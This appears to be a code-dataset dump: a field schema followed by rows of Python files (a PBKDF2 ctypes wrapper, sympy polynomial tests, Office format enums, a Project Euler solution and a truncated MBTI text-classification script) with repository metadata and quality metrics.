field | dtype
---|---
hexsha | string
size | int64
ext | string
lang | string
max_stars_repo_path | string
max_stars_repo_name | string
max_stars_repo_head_hexsha | string
max_stars_repo_licenses | list
max_stars_count | int64
max_stars_repo_stars_event_min_datetime | string
max_stars_repo_stars_event_max_datetime | string
max_issues_repo_path | string
max_issues_repo_name | string
max_issues_repo_head_hexsha | string
max_issues_repo_licenses | list
max_issues_count | int64
max_issues_repo_issues_event_min_datetime | string
max_issues_repo_issues_event_max_datetime | string
max_forks_repo_path | string
max_forks_repo_name | string
max_forks_repo_head_hexsha | string
max_forks_repo_licenses | list
max_forks_count | int64
max_forks_repo_forks_event_min_datetime | string
max_forks_repo_forks_event_max_datetime | string
content | string
avg_line_length | float64
max_line_length | int64
alphanum_fraction | float64
qsc_code_num_words_quality_signal | int64
qsc_code_num_chars_quality_signal | float64
qsc_code_mean_word_length_quality_signal | float64
qsc_code_frac_words_unique_quality_signal | float64
qsc_code_frac_chars_top_2grams_quality_signal | float64
qsc_code_frac_chars_top_3grams_quality_signal | float64
qsc_code_frac_chars_top_4grams_quality_signal | float64
qsc_code_frac_chars_dupe_5grams_quality_signal | float64
qsc_code_frac_chars_dupe_6grams_quality_signal | float64
qsc_code_frac_chars_dupe_7grams_quality_signal | float64
qsc_code_frac_chars_dupe_8grams_quality_signal | float64
qsc_code_frac_chars_dupe_9grams_quality_signal | float64
qsc_code_frac_chars_dupe_10grams_quality_signal | float64
qsc_code_frac_chars_replacement_symbols_quality_signal | float64
qsc_code_frac_chars_digital_quality_signal | float64
qsc_code_frac_chars_whitespace_quality_signal | float64
qsc_code_size_file_byte_quality_signal | float64
qsc_code_num_lines_quality_signal | float64
qsc_code_num_chars_line_max_quality_signal | float64
qsc_code_num_chars_line_mean_quality_signal | float64
qsc_code_frac_chars_alphabet_quality_signal | float64
qsc_code_frac_chars_comments_quality_signal | float64
qsc_code_cate_xml_start_quality_signal | float64
qsc_code_frac_lines_dupe_lines_quality_signal | float64
qsc_code_cate_autogen_quality_signal | float64
qsc_code_frac_lines_long_string_quality_signal | float64
qsc_code_frac_chars_string_length_quality_signal | float64
qsc_code_frac_chars_long_word_length_quality_signal | float64
qsc_code_frac_lines_string_concat_quality_signal | float64
qsc_code_cate_encoded_data_quality_signal | float64
qsc_code_frac_chars_hex_words_quality_signal | float64
qsc_code_frac_lines_prompt_comments_quality_signal | float64
qsc_code_frac_lines_assert_quality_signal | float64
qsc_codepython_cate_ast_quality_signal | float64
qsc_codepython_frac_lines_func_ratio_quality_signal | float64
qsc_codepython_cate_var_zero_quality_signal | bool
qsc_codepython_frac_lines_pass_quality_signal | float64
qsc_codepython_frac_lines_import_quality_signal | float64
qsc_codepython_frac_lines_simplefunc_quality_signal | float64
qsc_codepython_score_lines_no_logic_quality_signal | float64
qsc_codepython_frac_lines_print_quality_signal | float64
qsc_code_num_words | int64
qsc_code_num_chars | int64
qsc_code_mean_word_length | int64
qsc_code_frac_words_unique | null
qsc_code_frac_chars_top_2grams | int64
qsc_code_frac_chars_top_3grams | int64
qsc_code_frac_chars_top_4grams | int64
qsc_code_frac_chars_dupe_5grams | int64
qsc_code_frac_chars_dupe_6grams | int64
qsc_code_frac_chars_dupe_7grams | int64
qsc_code_frac_chars_dupe_8grams | int64
qsc_code_frac_chars_dupe_9grams | int64
qsc_code_frac_chars_dupe_10grams | int64
qsc_code_frac_chars_replacement_symbols | int64
qsc_code_frac_chars_digital | int64
qsc_code_frac_chars_whitespace | int64
qsc_code_size_file_byte | int64
qsc_code_num_lines | int64
qsc_code_num_chars_line_max | int64
qsc_code_num_chars_line_mean | int64
qsc_code_frac_chars_alphabet | int64
qsc_code_frac_chars_comments | int64
qsc_code_cate_xml_start | int64
qsc_code_frac_lines_dupe_lines | int64
qsc_code_cate_autogen | int64
qsc_code_frac_lines_long_string | int64
qsc_code_frac_chars_string_length | int64
qsc_code_frac_chars_long_word_length | int64
qsc_code_frac_lines_string_concat | null
qsc_code_cate_encoded_data | int64
qsc_code_frac_chars_hex_words | int64
qsc_code_frac_lines_prompt_comments | int64
qsc_code_frac_lines_assert | int64
qsc_codepython_cate_ast | int64
qsc_codepython_frac_lines_func_ratio | int64
qsc_codepython_cate_var_zero | int64
qsc_codepython_frac_lines_pass | int64
qsc_codepython_frac_lines_import | int64
qsc_codepython_frac_lines_simplefunc | int64
qsc_codepython_score_lines_no_logic | int64
qsc_codepython_frac_lines_print | int64
effective | string
hits | int64
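A record with this schema can be inspected with ordinary dataframe tooling. The sketch below is illustrative only: the `data.parquet` file name is a hypothetical stand-in for however the split is actually materialized.

```python
import pandas as pd

# Hypothetical local export of this split; the file name is an assumption.
df = pd.read_parquet("data.parquet")

row = df.iloc[0]
print(row["max_stars_repo_name"], row["max_stars_repo_path"])  # repo and file
print(row["content"][:200])                                    # raw source text
print(row["avg_line_length"], row["alphanum_fraction"])        # quality signals
```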
hexsha: 6aa62343269180c72e1026d8bfdc9d3fa9196b1e | size: 7,448 | ext: py | lang: Python
max_stars: path=gluon/contrib/pbkdf2_ctypes.py | repo=Cwlowe/web2py | head=6ae4c3c274be1026cbc45b0fcd8d1180c74b9070 | licenses=["BSD-3-Clause"] | count=9 | events=2018-04-19T05:08:30.000Z to 2021-11-23T07:36:58.000Z
max_issues: path=gluon/contrib/pbkdf2_ctypes.py | repo=mohit3011/Quiz-Mate | head=17988a623abde439aef2b43fc8dc3162b5cae15e | licenses=["BSD-3-Clause"] | count=98 | events=2017-11-02T19:00:44.000Z to 2022-03-22T16:15:39.000Z
max_forks: path=gluon/contrib/pbkdf2_ctypes.py | repo=mohit3011/Quiz-Mate | head=17988a623abde439aef2b43fc8dc3162b5cae15e | licenses=["BSD-3-Clause"] | count=9 | events=2017-10-24T21:53:36.000Z to 2021-11-23T07:36:59.000Z
content:
# -*- coding: utf-8 -*-
"""
pbkdf2_ctypes
~~~~~~
Fast pbkdf2.
This module implements pbkdf2 for Python using crypto lib from
openssl or commoncrypto.
Note: This module is intended as a plugin replacement of pbkdf2.py
by Armin Ronacher.
Git repository:
$ git clone https://github.com/michele-comitini/pbkdf2_ctypes.git
:copyright: Copyright (c) 2013: Michele Comitini <mcm@glisco.it>
:license: LGPLv3
"""
import ctypes
import ctypes.util
import hashlib
import platform
import os.path
import binascii
import sys
__all__ = ['pkcs5_pbkdf2_hmac', 'pbkdf2_bin', 'pbkdf2_hex']
__version__ = '0.99.3'
def _commoncrypto_hashlib_to_crypto_map_get(hashfunc):
hashlib_to_crypto_map = {hashlib.sha1: 1,
hashlib.sha224: 2,
hashlib.sha256: 3,
hashlib.sha384: 4,
hashlib.sha512: 5}
crypto_hashfunc = hashlib_to_crypto_map.get(hashfunc)
if crypto_hashfunc is None:
raise ValueError('Unknown digest %s' % hashfunc)
return crypto_hashfunc
def _commoncrypto_pbkdf2(data, salt, iterations, digest, keylen):
"""Common Crypto compatible wrapper
"""
c_hashfunc = ctypes.c_uint32(_commoncrypto_hashlib_to_crypto_map_get(digest))
c_pass = ctypes.c_char_p(data)
c_passlen = ctypes.c_size_t(len(data))
c_salt = ctypes.c_char_p(salt)
c_saltlen = ctypes.c_size_t(len(salt))
c_iter = ctypes.c_uint(iterations)
c_keylen = ctypes.c_size_t(keylen)
c_buff = ctypes.create_string_buffer(keylen)
crypto.CCKeyDerivationPBKDF.restype = ctypes.c_int
crypto.CCKeyDerivationPBKDF.argtypes = [ctypes.c_uint32,
ctypes.c_char_p,
ctypes.c_size_t,
ctypes.c_char_p,
ctypes.c_size_t,
ctypes.c_uint32,
ctypes.c_uint,
ctypes.c_char_p,
ctypes.c_size_t]
ret = crypto.CCKeyDerivationPBKDF(2, # hardcoded 2-> PBKDF2
c_pass, c_passlen,
c_salt, c_saltlen,
c_hashfunc,
c_iter,
c_buff,
c_keylen)
return (1 - ret, c_buff)
def _openssl_hashlib_to_crypto_map_get(hashfunc):
hashlib_to_crypto_map = {hashlib.md5: crypto.EVP_md5,
hashlib.sha1: crypto.EVP_sha1,
hashlib.sha256: crypto.EVP_sha256,
hashlib.sha224: crypto.EVP_sha224,
hashlib.sha384: crypto.EVP_sha384,
hashlib.sha512: crypto.EVP_sha512}
crypto_hashfunc = hashlib_to_crypto_map.get(hashfunc)
if crypto_hashfunc is None:
raise ValueError('Unknown digest %s' % hashfunc)
crypto_hashfunc.restype = ctypes.c_void_p
return crypto_hashfunc()
def _openssl_pbkdf2(data, salt, iterations, digest, keylen):
"""OpenSSL compatible wrapper
"""
c_hashfunc = ctypes.c_void_p(_openssl_hashlib_to_crypto_map_get(digest))
c_pass = ctypes.c_char_p(data)
c_passlen = ctypes.c_int(len(data))
c_salt = ctypes.c_char_p(salt)
c_saltlen = ctypes.c_int(len(salt))
c_iter = ctypes.c_int(iterations)
c_keylen = ctypes.c_int(keylen)
c_buff = ctypes.create_string_buffer(keylen)
# PKCS5_PBKDF2_HMAC(const char *pass, int passlen,
# const unsigned char *salt, int saltlen, int iter,
# const EVP_MD *digest,
# int keylen, unsigned char *out);
crypto.PKCS5_PBKDF2_HMAC.argtypes = [ctypes.c_char_p, ctypes.c_int,
ctypes.c_char_p, ctypes.c_int,
ctypes.c_int, ctypes.c_void_p,
ctypes.c_int, ctypes.c_char_p]
crypto.PKCS5_PBKDF2_HMAC.restype = ctypes.c_int
err = crypto.PKCS5_PBKDF2_HMAC(c_pass, c_passlen,
c_salt, c_saltlen,
c_iter,
c_hashfunc,
c_keylen,
c_buff)
return (err, c_buff)
try: # check that we have proper OpenSSL or Common Crypto on the system.
system = platform.system()
if system == 'Windows':
if platform.architecture()[0] == '64bit':
libname = ctypes.util.find_library('libeay64')
if not libname:
raise OSError('Library not found')
crypto = ctypes.CDLL(libname)
else:
libname = ctypes.util.find_library('libeay32')
if not libname:
raise OSError('Library libeay32 not found.')
crypto = ctypes.CDLL(libname)
_pbkdf2_hmac = _openssl_pbkdf2
crypto.PKCS5_PBKDF2_HMAC # test compatibility
elif system == 'Darwin': # think different(TM)! i.e. break things!
if [int(x) for x in platform.mac_ver()[0].split('.')] < [10, 7, 0]:
raise OSError('OS X Version too old %s < 10.7.0' % platform.mac_ver()[0])
libname = ctypes.util.find_library('System')
if not libname:
raise OSError('Library not found')
crypto = ctypes.CDLL(os.path.basename(libname))
_pbkdf2_hmac = _commoncrypto_pbkdf2
else:
libname = ctypes.util.find_library('crypto')
if not libname:
raise OSError('Library crypto not found.')
crypto = ctypes.CDLL(os.path.basename(libname))
_pbkdf2_hmac = _openssl_pbkdf2
crypto.PKCS5_PBKDF2_HMAC # test compatibility
except (OSError, AttributeError):
_, e, _ = sys.exc_info()
raise ImportError('Cannot find a compatible cryptographic library '
'on your system. %s' % e)
def pkcs5_pbkdf2_hmac(data, salt, iterations=1000, keylen=24, hashfunc=None):
if hashfunc is None:
hashfunc = hashlib.sha1
err, c_buff = _pbkdf2_hmac(data, salt, iterations, hashfunc, keylen)
if err == 0:
raise ValueError('wrong parameters')
return c_buff.raw[:keylen]
def pbkdf2_hex(data, salt, iterations=1000, keylen=24, hashfunc=None):
return binascii.hexlify(pkcs5_pbkdf2_hmac(data, salt, iterations, keylen, hashfunc))
def pbkdf2_bin(data, salt, iterations=1000, keylen=24, hashfunc=None):
return pkcs5_pbkdf2_hmac(data, salt, iterations, keylen, hashfunc)
if __name__ == '__main__':
try:
crypto.SSLeay_version.restype = ctypes.c_char_p
print(crypto.SSLeay_version(0))
except:
pass
import platform
if platform.python_version_tuple() < ('3', '0', '0'):
def bytes(*args):
return str(args[0])
for h in [hashlib.sha1, hashlib.sha224, hashlib.sha256,
hashlib.sha384, hashlib.sha512]:
print(binascii.hexlify(pkcs5_pbkdf2_hmac(bytes('secret', 'utf-8') * 11,
bytes('salt', 'utf-8'),
hashfunc=h)))
| 38.194872 | 88 | 0.569683 | 850 | 7,448 | 4.732941 | 0.223529 | 0.0609 | 0.041014 | 0.032811 | 0.49043 | 0.434999 | 0.338553 | 0.338553 | 0.272682 | 0.222719 | 0 | 0.034061 | 0.341702 | 7,448 | 194 | 89 | 38.391753 | 0.786457 | 0.116273 | 0 | 0.309353 | 0 | 0 | 0.054685 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057554 | false | 0.05036 | 0.064748 | 0.021583 | 0.179856 | 0.014388 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
effective: 0 | hits: 1
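A minimal usage sketch for the pbkdf2_ctypes module above, assuming it is saved as `pbkdf2_ctypes.py` on the import path and that a compatible OpenSSL or CommonCrypto library is installed (importing the module raises `ImportError` otherwise). The password and salt are illustrative placeholders; callers must pass bytes.

```python
import hashlib
from pbkdf2_ctypes import pbkdf2_bin, pbkdf2_hex  # the module shown above

# Derive a 24-byte key; password and salt values are placeholders.
key_hex = pbkdf2_hex(b'secret', b'salt', iterations=1000, keylen=24,
                     hashfunc=hashlib.sha256)
key_raw = pbkdf2_bin(b'secret', b'salt', iterations=1000, keylen=24)

print(key_hex)       # 48 hex characters (24 bytes)
print(len(key_raw))  # 24
```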
hexsha: 6aa7fd8436efabe5593a8174e9772f897fb7aec0 | size: 4,465 | ext: py | lang: Python
max_stars: path=sympy/polys/tests/test_sqfreetools.py | repo=eriknw/sympy | head=b7544e2bb74c011f6098a7e886fd77f41776c2c4 | licenses=["BSD-3-Clause"] | count=7 | events=2015-01-14T06:55:33.000Z to 2018-08-11T14:43:52.000Z
max_issues: path=sympy/polys/tests/test_sqfreetools.py | repo=pbeltran/sympy-1 | head=94f92b36731c2bebe6de1037c063c2a258a8a399 | licenses=["BSD-3-Clause"] | count=1 | events=2018-02-19T04:56:04.000Z to 2018-02-19T04:56:04.000Z
max_forks: path=sympy/polys/tests/test_sqfreetools.py | repo=pbeltran/sympy-1 | head=94f92b36731c2bebe6de1037c063c2a258a8a399 | licenses=["BSD-3-Clause"] | count=1 | events=2016-04-24T14:39:22.000Z to 2016-04-24T14:39:22.000Z
content:
"""Tests for square-free decomposition algorithms and related tools. """
from sympy.polys.rings import ring
from sympy.polys.domains import FF, ZZ, QQ
from sympy.polys.polyclasses import DMP
from sympy.polys.specialpolys import f_polys
from sympy.utilities.pytest import raises
f_0, f_1, f_2, f_3, f_4, f_5, f_6 = f_polys()
def test_dup_sqf():
R, x = ring("x", ZZ)
assert R.dup_sqf_part(0) == 0
assert R.dup_sqf_p(0) is True
assert R.dup_sqf_part(7) == 1
assert R.dup_sqf_p(7) is True
assert R.dup_sqf_part(2*x + 2) == x + 1
assert R.dup_sqf_p(2*x + 2) is True
assert R.dup_sqf_part(x**3 + x + 1) == x**3 + x + 1
assert R.dup_sqf_p(x**3 + x + 1) is True
assert R.dup_sqf_part(-x**3 + x + 1) == x**3 - x - 1
assert R.dup_sqf_p(-x**3 + x + 1) is True
assert R.dup_sqf_part(2*x**3 + 3*x**2) == 2*x**2 + 3*x
assert R.dup_sqf_p(2*x**3 + 3*x**2) is False
assert R.dup_sqf_part(-2*x**3 + 3*x**2) == 2*x**2 - 3*x
assert R.dup_sqf_p(-2*x**3 + 3*x**2) is False
assert R.dup_sqf_list(0) == (0, [])
assert R.dup_sqf_list(1) == (1, [])
assert R.dup_sqf_list(x) == (1, [(x, 1)])
assert R.dup_sqf_list(2*x**2) == (2, [(x, 2)])
assert R.dup_sqf_list(3*x**3) == (3, [(x, 3)])
assert R.dup_sqf_list(-x**5 + x**4 + x - 1) == \
(-1, [(x**3 + x**2 + x + 1, 1), (x - 1, 2)])
assert R.dup_sqf_list(x**8 + 6*x**6 + 12*x**4 + 8*x**2) == \
( 1, [(x, 2), (x**2 + 2, 3)])
assert R.dup_sqf_list(2*x**2 + 4*x + 2) == (2, [(x + 1, 2)])
R, x = ring("x", QQ)
assert R.dup_sqf_list(2*x**2 + 4*x + 2) == (2, [(x + 1, 2)])
R, x = ring("x", FF(2))
assert R.dup_sqf_list(x**2 + 1) == (1, [(x + 1, 2)])
R, x = ring("x", FF(3))
assert R.dup_sqf_list(x**10 + 2*x**7 + 2*x**4 + x) == \
(1, [(x, 1),
(x + 1, 3),
(x + 2, 6)])
R1, x = ring("x", ZZ)
R2, y = ring("y", FF(3))
f = x**3 + 1
g = y**3 + 1
assert R1.dup_sqf_part(f) == f
assert R2.dup_sqf_part(g) == y + 1
assert R1.dup_sqf_p(f) is True
assert R2.dup_sqf_p(g) is False
R, x, y = ring("x,y", ZZ)
A = x**4 - 3*x**2 + 6
D = x**6 - 5*x**4 + 5*x**2 + 4
f, g = D, R.dmp_sub(A, R.dmp_mul(R.dmp_diff(D, 1), y))
res = R.dmp_resultant(f, g)
h = (4*y**2 + 1).drop(x)
assert R.drop(x).dup_sqf_list(res) == (45796, [(h, 3)])
R, x = ring("x", ZZ["t"])
assert R.dup_sqf_list_include(DMP([1, 0, 0, 0], ZZ)*x**2) == \
[(DMP([1, 0, 0, 0], ZZ), 1), (DMP([1], ZZ)*x, 2)]
def test_dmp_sqf():
R, x, y = ring("x,y", ZZ)
assert R.dmp_sqf_part(0) == 0
assert R.dmp_sqf_p(0) is True
assert R.dmp_sqf_part(7) == 1
assert R.dmp_sqf_p(7) is True
assert R.dmp_sqf_list(3) == (3, [])
assert R.dmp_sqf_list_include(3) == [(3, 1)]
R, x, y, z = ring("x,y,z", ZZ)
assert R.dmp_sqf_p(f_0) is True
assert R.dmp_sqf_p(f_0**2) is False
assert R.dmp_sqf_p(f_1) is True
assert R.dmp_sqf_p(f_1**2) is False
assert R.dmp_sqf_p(f_2) is True
assert R.dmp_sqf_p(f_2**2) is False
assert R.dmp_sqf_p(f_3) is True
assert R.dmp_sqf_p(f_3**2) is False
assert R.dmp_sqf_p(f_5) is False
assert R.dmp_sqf_p(f_5**2) is False
assert R.dmp_sqf_p(f_4) is True
assert R.dmp_sqf_part(f_4) == -f_4
assert R.dmp_sqf_part(f_5) == x + y - z
R, x, y, z, t = ring("x,y,z,t", ZZ)
assert R.dmp_sqf_p(f_6) is True
assert R.dmp_sqf_part(f_6) == f_6
R, x = ring("x", ZZ)
f = -x**5 + x**4 + x - 1
assert R.dmp_sqf_list(f) == (-1, [(x**3 + x**2 + x + 1, 1), (x - 1, 2)])
assert R.dmp_sqf_list_include(f) == [(-x**3 - x**2 - x - 1, 1), (x - 1, 2)]
R, x, y = ring("x,y", ZZ)
f = -x**5 + x**4 + x - 1
assert R.dmp_sqf_list(f) == (-1, [(x**3 + x**2 + x + 1, 1), (x - 1, 2)])
assert R.dmp_sqf_list_include(f) == [(-x**3 - x**2 - x - 1, 1), (x - 1, 2)]
f = -x**2 + 2*x - 1
assert R.dmp_sqf_list_include(f) == [(-1, 1), (x - 1, 2)]
R, x, y = ring("x,y", FF(2))
raises(NotImplementedError, lambda: R.dmp_sqf_list(y**2 + 1))
def test_dup_gff_list():
R, x = ring("x", ZZ)
f = x**5 + 2*x**4 - x**3 - 2*x**2
assert R.dup_gff_list(f) == [(x, 1), (x + 2, 4)]
g = x**9 - 20*x**8 + 166*x**7 - 744*x**6 + 1965*x**5 - 3132*x**4 + 2948*x**3 - 1504*x**2 + 320*x
assert R.dup_gff_list(g) == [(x**2 - 5*x + 4, 1), (x**2 - 5*x + 4, 2), (x, 3)]
raises(ValueError, lambda: R.dup_gff_list(0))
| 29.569536 | 100 | 0.519821 | 975 | 4,465 | 2.212308 | 0.082051 | 0.178489 | 0.12981 | 0.156699 | 0.662031 | 0.596198 | 0.504868 | 0.385257 | 0.29949 | 0.223459 | 0 | 0.088722 | 0.255319 | 4,465 | 150 | 101 | 29.766667 | 0.56 | 0.014558 | 0 | 0.135922 | 0 | 0 | 0.00774 | 0 | 0 | 0 | 0 | 0 | 0.572816 | 1 | 0.029126 | false | 0 | 0.048544 | 0 | 0.07767 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
effective: 0 | hits: 1
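The `R.dup_sqf_list`/`R.dmp_sqf_list` calls above exercise sympy's low-level polynomial rings; the same square-free decomposition is reachable through the public API. A short sketch (standard sympy usage, reproducing one expected value from `test_dup_sqf`):

```python
from sympy import sqf_list, symbols

x = symbols('x')

# Same polynomial as in test_dup_sqf; sqf_list returns
# (content, [(factor, multiplicity), ...]).
print(sqf_list(-x**5 + x**4 + x - 1))
# (-1, [(x**3 + x**2 + x + 1, 1), (x - 1, 2)])
```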
hexsha: 6aa848925fe885025486d711e7226e473656a954 | size: 1,377 | ext: py | lang: Python
max_stars: path=ezno_convert/enums.py | repo=ofersadan85/ezno_convert | head=4c5cf7d41c72698e5486068673f170d968a9de27 | licenses=["MIT"] | count=2 | events=2021-02-07T21:27:04.000Z to 2021-03-13T06:47:25.000Z
max_issues: path=ezno_convert/enums.py | repo=ofersadan85/ezno_convert | head=4c5cf7d41c72698e5486068673f170d968a9de27 | licenses=["MIT"] | count=1 | events=2021-02-10T05:45:00.000Z to 2021-02-10T05:45:00.000Z
max_forks: path=ezno_convert/enums.py | repo=ofersadan85/ezno_convert | head=4c5cf7d41c72698e5486068673f170d968a9de27 | licenses=["MIT"] | count=null | events=null
content:
import enum
from typing import Union
@enum.unique
class PPT(enum.Enum):
# Source: https://docs.microsoft.com/en-us/office/vba/api/powerpoint.ppsaveasfiletype
AnimatedGIF = 40
BMP = 19
Default = 11
EMF = 23
External = 64000
GIF = 16
JPG = 17
META = 15
MP4 = 39
OpenPresentation = 35
PDF = 32
PNG = 18
Presentation = 1
RTF = 6
SHOW = 7
Template = 5
TIF = 21
WMV = 37
XPS = 33
app = 'Powerpoint.Application'
extensions = ('.ppt', '.pptx')
@enum.unique
class WORD(enum.Enum):
# Source: https://docs.microsoft.com/en-us/office/vba/api/word.wdsaveformat
DosText = 4
DosTextLineBreaks = 5
FilteredHTML = 10
FlatXML = 19
OpenDocumentText = 23
HTML = 8
RTF = 6
Template = 1
Text = 2
TextLineBreaks = 3
UnicodeText = 7
WebArchive = 9
XML = 11
Document97 = 0
DocumentDefault = 16
PDF = 17
XPS = 18
app = 'Word.Application'
extensions = ('.doc', '.docx')
@enum.unique
class XL(enum.Enum):
# Source: https://docs.microsoft.com/en-us/office/vba/api/excel.xlfixedformattype
# TODO: Implement "SaveAs" methods, see: https://docs.microsoft.com/en-us/office/vba/api/excel.workbook.saveas
PDF = 0
XPS = 1
app = 'Excel.Application'
extensions = ('.xls', '.xlsx')
enum_types = Union[PPT, WORD, XL]
| 20.863636 | 114 | 0.611474 | 177 | 1,377 | 4.751412 | 0.553672 | 0.042806 | 0.085612 | 0.099881 | 0.237812 | 0.237812 | 0.237812 | 0.237812 | 0.237812 | 0.237812 | 0 | 0.065606 | 0.269426 | 1,377 | 65 | 115 | 21.184615 | 0.770378 | 0.251271 | 0 | 0.09434 | 0 | 0 | 0.079922 | 0.021443 | 0 | 0 | 0 | 0.015385 | 0 | 1 | 0 | false | 0 | 0.037736 | 0 | 0.924528 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
effective: 0 | hits: 1
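A brief sketch of consuming these enums, assuming the file above is importable as `enums`. Note that `app` and `extensions` are themselves enum members, so their payloads are reached through `.value`:

```python
from enums import PPT, WORD, XL  # assumes the file above is on the path

print(PPT.PDF.value)         # 32, the PowerPoint SaveAs code for PDF
print(WORD.PDF.value)        # 17
print(XL.app.value)          # 'Excel.Application'
print(PPT.extensions.value)  # ('.ppt', '.pptx')
```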
hexsha: 6ab5293b9595b159942c1bb0c1e2bfcef5e08aec | size: 1,029 | ext: py | lang: Python
max_stars: path=solutions/PE4.py | repo=KerimovEmil/ProjectEuler | head=bc9cb682181c1ac7889ee57c36d32beae7b441a8 | licenses=["MIT"] | count=1 | events=2022-01-22T19:48:44.000Z to 2022-01-22T19:48:44.000Z
max_issues: path=solutions/PE4.py | repo=KerimovEmil/ProjectEuler | head=bc9cb682181c1ac7889ee57c36d32beae7b441a8 | licenses=["MIT"] | count=null | events=null
max_forks: path=solutions/PE4.py | repo=KerimovEmil/ProjectEuler | head=bc9cb682181c1ac7889ee57c36d32beae7b441a8 | licenses=["MIT"] | count=null | events=null
content:
"""
PROBLEM
A palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers
is 9009 = 91 × 99.
Find the largest palindrome made from the product of two 3-digit numbers.
ANSWER:
906609
Solve time ~ 0.760 seconds
"""
from itertools import product
import unittest
from util.utils import timeit
class Problem4:
def __init__(self, num_digits):
self.lower = 10 ** (num_digits - 1) - 1
self.upper = 10 ** num_digits - 1
@staticmethod
def is_palindrome(num):
return str(num) == str(num)[::-1]
@timeit
def solve(self):
pds = []
for i, j in product(range(self.lower, self.upper), repeat=2):
if self.is_palindrome(i * j):
pds.append(i * j)
return max(pds)
class Solution4(unittest.TestCase):
def setUp(self):
self.problem = Problem4(3)
def test_solution(self):
self.assertEqual(906609, self.problem.solve())
if __name__ == '__main__':
unittest.main()
| 21.4375 | 114 | 0.640428 | 144 | 1,029 | 4.458333 | 0.493056 | 0.042056 | 0.062305 | 0.074766 | 0.133956 | 0.133956 | 0.133956 | 0.133956 | 0.133956 | 0 | 0 | 0.050781 | 0.253644 | 1,029 | 47 | 115 | 21.893617 | 0.783854 | 0.252673 | 0 | 0 | 0 | 0 | 0.010512 | 0 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0.208333 | false | 0 | 0.125 | 0.041667 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
effective: 0 | hits: 1
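The whole solution hinges on the string-reversal palindrome test; the docstring's numbers can be verified standalone (plain Python, mirroring `Problem4.is_palindrome`):

```python
def is_palindrome(num):
    return str(num) == str(num)[::-1]

assert is_palindrome(91 * 99)  # 9009, the 2-digit example
assert is_palindrome(906609)   # the stated 3-digit answer
assert 906609 == 913 * 993     # and it factors into two 3-digit numbers
```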
hexsha: 6ab606d6bade1bb254f8ee2b1905c9d3d07e2051 | size: 11,447 | ext: py | lang: Python
max_stars: path=ai_analysis.py | repo=kwangilkimkenny/chatbot_seq2seq_flask | head=f2f3bda9311c5f2930aebc8ae4a6497597b190e1 | licenses=["MIT"] | count=null | events=null
max_issues: path=ai_analysis.py | repo=kwangilkimkenny/chatbot_seq2seq_flask | head=f2f3bda9311c5f2930aebc8ae4a6497597b190e1 | licenses=["MIT"] | count=null | events=null
max_forks: path=ai_analysis.py | repo=kwangilkimkenny/chatbot_seq2seq_flask | head=f2f3bda9311c5f2930aebc8ae4a6497597b190e1 | licenses=["MIT"] | count=null | events=null
content:
import pandas as pd
import numpy as np
import re
import pickle
# plotting
import seaborn as sns
import matplotlib.pyplot as plt
# Tune learning_rate
from numpy import loadtxt
from xgboost import XGBClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import StratifiedKFold
# First XGBoost model for MBTI dataset
from numpy import loadtxt
from xgboost import XGBClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
##### Compute list of subject with Type | list of comments
from nltk.stem import PorterStemmer, WordNetLemmatizer
from nltk.corpus import stopwords
from nltk import word_tokenize
import nltk
nltk.download('wordnet')
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.manifold import TSNE
# Convert the MBTI type letters into numbers
def get_types(row):
t=row['type']
I = 0; N = 0
T = 0; J = 0
if t[0] == 'I': I = 1
elif t[0] == 'E': I = 0
else: print('I-E incorrect')
if t[1] == 'N': N = 1
elif t[1] == 'S': N = 0
else: print('N-S incorrect')
if t[2] == 'T': T = 1
elif t[2] == 'F': T = 0
else: print('T-F incorrect')
if t[3] == 'J': J = 1
elif t[3] == 'P': J = 0
else: print('J-P incorrect')
return pd.Series( {'IE':I, 'NS':N , 'TF': T, 'JP': J })
# Set up the mapping dictionary
b_Pers = {'I':0, 'E':1, 'N':0, 'S':1, 'F':0, 'T':1, 'J':0, 'P':1}
# Pair the entries up, two per axis, into a list of dictionaries
b_Pers_list = [{0:'I', 1:'E'}, {0:'N', 1:'S'}, {0:'F', 1:'T'}, {0:'J', 1:'P'}]
def translate_personality(personality):
# transform mbti to binary vector
return [b_Pers[l] for l in personality]
def translate_back(personality):
# transform binary vector to mbti personality
s = ""
for i, l in enumerate(personality):
s += b_Pers_list[i][l]
return s
# We want to remove these from the posts
unique_type_list = ['INFJ', 'ENTP', 'INTP', 'INTJ', 'ENTJ', 'ENFJ', 'INFP', 'ENFP',
'ISFP', 'ISTP', 'ISFJ', 'ISTJ', 'ESTP', 'ESFP', 'ESTJ', 'ESFJ']
unique_type_list = [x.lower() for x in unique_type_list]
# Lemmatize
stemmer = PorterStemmer()
lemmatiser = WordNetLemmatizer()
# Cache the stop words for speed
cachedStopWords = stopwords.words("english")
def pre_process_data(data, remove_stop_words=True, remove_mbti_profiles=True):
list_personality = []
list_posts = []
len_data = len(data)
i=0
for row in data.iterrows():
i+=1
if (i % 500 == 0 or i == 1 or i == len_data):
